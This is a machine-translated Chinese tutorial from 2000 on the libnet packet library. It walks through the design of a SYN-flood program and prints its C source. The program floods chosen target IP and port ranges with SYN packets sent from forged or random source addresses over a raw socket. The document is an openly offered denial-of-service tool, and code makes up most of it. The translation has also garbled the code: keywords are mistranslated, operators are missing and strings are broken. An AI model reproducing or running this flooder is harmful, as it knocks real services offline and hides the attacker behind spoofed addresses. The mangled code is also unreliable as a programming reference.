Example of LIBNET (3)

libnet use the example (3) 2000-01-01 Baiyun Huang Wuhan station Safety Digest Author: small four Home Page: http: //www.isbase.com Date: 2000-07-2711 : The principle of 05syn-flood is no longer repeated. You need to pass the target IP through the command line, you should allow a single IP or a specified IP range, which can be unified into a specified IP range. It is also necessary to pass the target port by the command line, in the same, allow the specified port range, and specify a single port is limited to a port on one port. No matter what reason, the native (hosting host) IP should not be used as the source IP, so you need to specify a forged source IP through the command line. In the case of the source IP on the command line, use pseudo-random The number generator generates a pseudo-random source IP. Treatment of source ports like source IP. The so-called flood, naturally consider the number of times the SYN packet is sent, but also specified by the command line parameter. The following example is conducted on the I386 / Linux platform, using the getOpt () function long option support, if you go to the SPARC / Solaris platform, it is generally not supported, this deliberate does not provide this compatibility, N Don't have long options, itch, will it, if you want to transplant, change the command line parameter processing section.

-------------------------------------------------- ------------------------ / ** File: SYN FLOOD Program for i386 / linux using libnet * Version: 0.99 Alpha * Author: SCZ *: http://www.isbase.com* Complie: gcc -o3 -o sf syn-flood.c `libnet-config --defines --cflags`` libnet-config --libs` * Usage: ./sf - dil 192.168.10.2 - DIH 192.168.10.2 - DPL 23 --DPH 23 * DATE: 2000-07-27 10:52 * // ********** *********************************************************** ******** ** head File ** ************************************ ******************************************* / # include #include #include / * generated randomized seeds using time () / # include / * Use getopt () long option to support * / # include / * Use libnet must contain this header file * // ********************* ******************************************* ** Macro definition ******************************************************************** ****************************** / # define _gnu_source # define success 0 # define failure -1 # define defaultsynnunumber 74 / * Default Send SYN Packet Number * / Struct Ipoctet {Char a [4]; char b [4]; char C [4]; char d [4];}; struct ketocteti {Int a; int b; INT C; INT D;}; / **************************************************** ************************* ******* **************** *********************************************************** * // * Used to initialize the pseudo random number generator * / u_long randomstate [64] =

{0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0, 0xab5c5918, 0x946554fd, 0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88, 0xe369735d, 0x904f35f7,0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5, 0xf103bc02, 0x48f340fb, 0x36413f93 , 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b, 0x27fb47b9, 0x9a319039,0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a, 0x8088e080, 0x02800004,0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000, 0x94100003, 0xd60a0000,0x90022001, 0x840ae07f , 0x85288003, 0x94128002, 0x808ae080, 0x12bffffa, 0x8600e007, 0x80a0e01f, 0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002, 0x81c3e008, 0xd4224000}; u_char * packet = NULL; / * syn-flood does not need to load * / size_t packet_size = LIBNET_IP_H LIBNET_TCP_H; int Rawsocket; / *************************************************************** *********************** ** Function prototype ** ****************** *************************************** **************** / VOID LIBNET_DO_CHECKSUM (u_char * buf, int protocol, int LEN); void libnet_init_packet (size_t p_size, u_char ** buf); int Libnet_Open_RAW_SOCK (INT Protocol); void Libnet_write_ip (int sock, u_char * packet, int len); void synFlood (u_long srcIp, u_short srcPort, u_long dstIp, u_short dstPort, u_long synNumber); void usage (char * arg); / * ------- -------------------------------------------------- ----------- * / void libnet_do_checksum (u_char * buf, int protocol, int LEN) {ix (libnet_do_checksum (buf, protocol, len) == -1) {libnet_error (libnet_err_fatal, " LIBNET_DO_CHECKSUM FAILED / N ");} Return;

} / * End of Libnet_do_checksum * / void Libnet_init_packet (size_t p_size, u_char ** buf) {if (libnet_init_packet (p_size, buf) == -1) {libnet_error (LIBNET_ERR_FATAL, "Can" t initialize packet / n ");} return;} / * end of Libnet_init_packet * / int Libnet_open_raw_sock (int protocol) {int s; if ((s = libnet_open_raw_sock (protocol)) == -1) {libnet_error (LIBNET_ERR_FATAL, "Can" t open raw socket% 08x / N ", protocol);} RETURN (S);} / * end of libnet_open_raw_sock * / void libnet_write_ip (int sock, u_char * packet, int LEN) {Int W; if ((w = libnet_write_ip (sock, packet, len) )

/ * Construct TCP head * / libnet_build_tcp ((u_short), / * source port * / dstport, / * target port * / 0x51211314, / * SEQ Num * / 0, / * ACK NUM * / TH_SYN, / * Control Flags * / 1024, / * window size * / 0, / * urgent pointer * / null, / * payload (none) * / 0, / * payload length * / packet libnet_ip_h); / * Point to TCP header * // * Calculate TCP checksum, IP checksum by kernel * / libnet_do_checksum (packet, ipproto_tcp, libnet_tcp_h); / * Send SYN message * / libnet_write_ip (Rawsocket, Packet, Packet_size); // This output Too time, if it is not a debug, you should remove // ​​fprintf (stderr, ");} / * end of for * / return;} / * end of synflood * / void usage (char * arg) {fprintf ( Stderr, "USAGE:% s [--dil dstiplow] [--dih dstiphigh] / n / t" [- sp srcport] [--dpl dstportlow] [--dph dstporthigh] / N / t "" [- num synnnumber] / n ", arg); exit (fail);} / * end of usage * / int main (int Argc, char * argv []) {# Define longoptionchar" - " / * Define long option * / static struct option longoption [] = {{"Si", 1, 0, longoptionchar}, / * source IP * / {"dil", 1, 0, longoptionchar}, / * target IP low End * / {"DIH", 1, 0, longoptionchar}, / * target IP high-end * / {"Sp", 1, 0, longoptionchar}, / * source port * / {"DPL", 1, 0, longoptionchar}, / * target port low * / {"dph", 1, 0, longoptionchar }, / * Target port high end * / {"num", 1, 0, longoptionchar}, / * SYN packet number * / {0, 0, 0, 0}}; int longoptionindex = 0; / * For processing Long option * / INT I, J, A, B, C, D; Struct ipoctipStart, Ipend; Ipend iPector ipstarti, Ipendi; strunt ipoct * pipstart = & ipStart; struct = & odent * pipend = & hepend; / * Source IP uses network Node sequence designation * / u_long srcip = 0xffffffff; u_long dstip; u_short srcport = 0xfff; u_short dstport; u_short dstportlow = 1; / * Default port range 1-1024 * / u_short dstporthigh = 1024; u_long synnumber =

DEFAULTSYNNUMBER; / * SYN PPT Number * / unsigned int randomseed = (unsigned int) Time (null); if (argc == 1) {usage (argv [0]);} initstate (randomseed, (char *) RandomState, 128); setState ((char *) rDOMSTATE); OpterR = 0; / * don "T Want getopt () Writing to stderr * / while ((c = getopt_long (argc, argv," h ", longoption, & longoptioninDex)) ! = EOF) {Switch (c) {copy longoptionchar: / * Processing length option * // * fprintf (stderr, "option% s", longoption [longoptionindex] .name); if (Optarg) {fprintf (stderr, " WITH ARG% S ", OPTARG);} fprintf (stderr," / n "); * / if (optarg) {switch (longoptionindex) {case 0: / * return value is BIG-endian order * / srcip = libnet_name_resolve OPTARG, LIBNET_DONT_RESOLVE; if (srcip == -1) {libnet_error (libnet_err_fatal, "Bad srcip:% S / N", OPTARG);} Break; Case 1: / * Verification is a dot decimal IPv4 address representation * / IF (libnet_name_resolve (optARG, libnet_dont_resolve == -1) {/ * The first parameter is libnet_err_fatal, which causes exit * / libnet_error (libnet_err_fatal, "bad dstiplow:% s / n", OPTARG);} i = j = 0; while (Optarg [i]! = ") {Pipstart- > a [j ] = Optarg [i ];} pipstart-> a [j] = "/ 0" j = 0; i ; while (Optarg [i]! = ") {pipstart-> b [j ] = OPTARG [i ];} pipstart-> b [j] = "/ 0" j = 0; i ; while (Optarg [i]! = ") {Pipstart-> c [j ] = Optarg [i ] PipStart-> C [J] = "/ 0" j = 0; i ; while (Optarg [i]! = "/ 0") {pipstart-> d [j ] = OPTARG [i ];} PipStart- > d [j] = "/ 0"

/ * Convert to integer values ​​and store in struct * / if (pipstart-> a! = Null) {ipStarti.a = atoi (pipstart-> a);} if (pipstart-> b! = Null) {ipstarti.b = ATOI (pipstart-> b);} if (pipstart-> c! = Null) {ipStarti.c = ATOI (pipstart-> c);} if (pipstart-> d! = Null) {ipstarti.d = atoi (PipStart-> D);} Break; Case 2: / * Verified whether it is a decimal IPv4 address representation * / if (libnet_name_resolve (OPTARG, LIBNET_DONT_RESOLVE == -1) {/ * The first parameter is libnet_err_fatal, will Resulting in exit * / libnet_error (libnet_err_fatal, "Bad Dstiphigh:% S / N", OPTARG);} i = j = 0; While (Optarg [i]! = ") {Pipend-> a [j ] = Optarg [I ];} pipend-> a [j] = "/ 0" j = 0; i ; while (Optarg [i]! = ") {Pipend-> b [j ] = OPTARG [i ];} Pipend-> b [j] = "/ 0" j = 0; i ; while (Optarg [i]! = ") {pipend-> c [j ] = OPTARG [i ];} pagend-> C [ j] = "/ 0" j = 0; i ; while (Optarg [i]! = "/ 0") {pipend-> d [j ] = Optarg [i ];} pipend-> d [j] = " / 0 "/ * Convert to Integer Values ​​and store in struct * / if (pipend-> a! = Null) {ipendi.a = atoi (pipend-> a);} if (pipend-> b! = Null) { Ipendi.b = ATOI (pipend-> b);} if (pipend-> c! = null) {ipendi.c = ATOI (pipend-> c);} if (pipend-> d! = null) {ipendi.d = atoi Pipend-> D);} Break; Case 3: / * Adoption of 10 Binary * / srcport = (u_short) Strtoul (Optarg, NULL, 10); Break; Case 4: Dstportlow = (U_SHORT) STRTOUL (Optarg, NULL, 10); Break; Case 5: dstporthigh = (u_short) Strtoul (Optarg, NULL, 10); BREAK;

Case 6: / * adopted 10 credit * / synnumber = (u_long) Strtoul (Optarg, NULL, 10); if (Synnnumber == 0) {fprintf (stderr, "check your synnnumber / n"); exit (failure) Break; default: Break;} / * end of switch * /} Break; Case "H": Case "?": usage (argv [0]);} / * end of switch * /} / * end of While * / if (dstportlow> dstportHigh) {fprintf (stderr, "check your low and high port / n"); exit (failure);} fprintf (stderr, "[flooding from% d.% d.% d.% D ->% d.% d.% d.% d] / n ", ipstarti.a, ipstarti.b, ipstarti.c, ipstarti.d, ipndi.a, ipndi.b, ipndi.c, ipendi. d); fprintf (stderr, "[flooding from% u ->% u] / n", dstportlow, dstporthigh); / * Assign memory and initializes zero * / libnet_init_packet (packet_size, & packet); / * Create RAW_SOCKET * / rawsocket = libnet_open_raw_sock (ipproto_raw); for (a = ipStarti.a; a <= ipndi.a; a ) {for (b = ipstarti.b; b <= ipEndi.b; b ) {for (c = ipstarti. C; c <= ipEndi.c; c ) {for (d = ipStarti.d; d <= ipEndi.d; d ) {/ * requires a BIG-Endian order, and i386 / linux itself is Little-endian order * / dstip = D * 0x1000000 C * 0x10000 b * 0x 100 a; for (dstport = dstportlow; dstport <= dstporthigh; dstport ) {if (srcip == 0xfffffffff) {/ * randomized source IP * / srcip = (u_long) Random ();} if (srcport == 0xfffff ) {/ * Randomized source port * / srcport = (u_short) Random ();} Synflood (SRCIP, Srcport, Dstip, Dstport, SynnUmber);}}}}} / * Close Raw_Socket * / libnet_close_raw_sock (RawSocket); / * Release the memory * / libnet_destroy_packet (& packet) assigned by libnet_init_packet (); fprintf (stderr, "/ n"); Return (Success);